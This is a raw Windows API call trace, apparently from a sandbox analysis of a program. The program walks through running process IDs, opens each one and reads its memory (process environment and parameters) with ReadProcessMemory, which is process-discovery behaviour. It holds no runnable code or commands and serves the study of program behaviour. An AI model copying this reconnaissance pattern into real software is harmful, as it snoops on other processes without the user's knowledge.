[0402.546] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.546] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.574] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x0
[0402.574] CloseHandle (hObject=0x0) returned 0
[0402.575] _ui64tow (_Value=0x470, _Buffer="1040", _Radix=10) returned="1136"
[0402.580] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1136") returned 4
[0402.581] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.581] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x0
[0402.612] CloseHandle (hObject=0x0) returned 0
[0402.613] _ui64tow (_Value=0x490, _Buffer="1136", _Radix=10) returned="1168"
[0402.618] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1168") returned 4
[0402.622] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.622] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.678] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x240
[0402.678] GetLastError () returned 0x0
[0402.678] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.678] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd6018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.678] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.679] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d27c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.679] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d2688, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.682] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.683] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.683] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd6020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.683] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.684] malloc (_Size=0x20) returned 0x2bff30
[0402.684] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2d26ca, lpBuffer=0x2bff30, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bff30*, lpNumberOfBytesRead=0x0) returned 1
[0402.684] free (_Block=0x2bff30)
[0402.685] CloseHandle (hObject=0x240) returned 1
[0402.686] _ui64tow (_Value=0x4b0, _Buffer="1168", _Radix=10) returned="1200"
[0402.690] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1200") returned 4
[0402.691] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.692] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b0) returned 0x0
[0402.718] CloseHandle (hObject=0x0) returned 0
[0402.719] _ui64tow (_Value=0x778, _Buffer="1200", _Radix=10) returned="1912"
[0402.723] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1912") returned 4
[0402.724] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x124398, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.724] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.762] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x778) returned 0x240
[0402.762] GetLastError () returned 0x0
[0402.762] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.762] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x262820, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2626a6, lpBuffer=0x12dd100, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.764] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.765] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.765] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.765] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x261e90, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.766] malloc (_Size=0x32) returned 0x2be140
[0402.766] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2626d6, lpBuffer=0x2be140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2be140*, lpNumberOfBytesRead=0x0) returned 1
[0402.766] free (_Block=0x2be140)
[0402.767] CloseHandle (hObject=0x240) returned 1
[0402.769] _ui64tow (_Value=0x628, _Buffer="1912", _Radix=10) returned="1576"
[0402.773] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1576") returned 4
[0402.775] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.775] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.812] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x628) returned 0x0
[0402.812] CloseHandle (hObject=0x0) returned 0
[0402.813] _ui64tow (_Value=0x2b0, _Buffer="1576", _Radix=10) returned="688"
[0402.818] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="688") returned 3
[0402.823] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.823] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.847] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2b0) returned 0x0
[0402.848] CloseHandle (hObject=0x0) returned 0
[0402.849] _ui64tow (_Value=0x6a4, _Buffer="688", _Radix=10) returned="1700"
[0402.853] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1700") returned 4
[0402.855] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243b8, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.855] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x0
[0402.876] CloseHandle (hObject=0x0) returned 0
[0402.877] _ui64tow (_Value=0x73c, _Buffer="1700", _Radix=10) returned="1852"
[0402.881] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1852") returned 4
[0402.883] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.883] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x73c) returned 0x240
[0402.903] GetLastError () returned 0x0
[0402.903] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d29e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d2796, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.905] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.906] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.906] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.906] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d1ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.907] malloc (_Size=0x8a) returned 0x2c4740
[0402.907] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1d2802, lpBuffer=0x2c4740, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0402.907] free (_Block=0x2c4740)
[0402.908] CloseHandle (hObject=0x240) returned 1
[0402.908] _ui64tow (_Value=0x728, _Buffer="1852", _Radix=10) returned="1832"
[0402.912] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1832") returned 4
[0402.923] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.923] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.951] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x728) returned 0x240
[0402.951] GetLastError () returned 0x0
[0402.951] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x432a50, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.951] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4327e6, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.953] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.954] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x431f40, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.954] malloc (_Size=0xa4) returned 0x2c4740
[0402.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x432852, lpBuffer=0x2c4740, nSize=0xa2, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0402.955] free (_Block=0x2c4740)
[0402.959] CloseHandle (hObject=0x240) returned 1
[0402.961] _ui64tow (_Value=0x978, _Buffer="1832", _Radix=10) returned="2424"
[0402.968] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2424") returned 4
[0402.969] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.969] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x240
[0402.997] GetLastError () returned 0x0
[0402.998] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.998] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d26ea, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.999] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.001] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.001] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.001] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.001] malloc (_Size=0x6e) returned 0x2c4740
[0403.001] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4d2750, lpBuffer=0x2c4740, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.002] free (_Block=0x2c4740)
[0403.002] CloseHandle (hObject=0x240) returned 1
[0403.004] _ui64tow (_Value=0x980, _Buffer="2424", _Radix=10) returned="2432"
[0403.009] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2432") returned 4
[0403.014] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.014] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.046] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x240
[0403.046] GetLastError () returned 0x0
[0403.046] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.046] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.047] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.047] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.047] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c26fa, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.048] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.049] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.050] malloc (_Size=0x70) returned 0x2c4740
[0403.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c2762, lpBuffer=0x2c4740, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.050] free (_Block=0x2c4740)
[0403.051] CloseHandle (hObject=0x240) returned 1
[0403.052] _ui64tow (_Value=0x988, _Buffer="2432", _Radix=10) returned="2440"
[0403.057] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2440") returned 4
[0403.058] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service PaȰ\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.058] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.084] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x240
[0403.084] GetLastError () returned 0x0
[0403.085] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
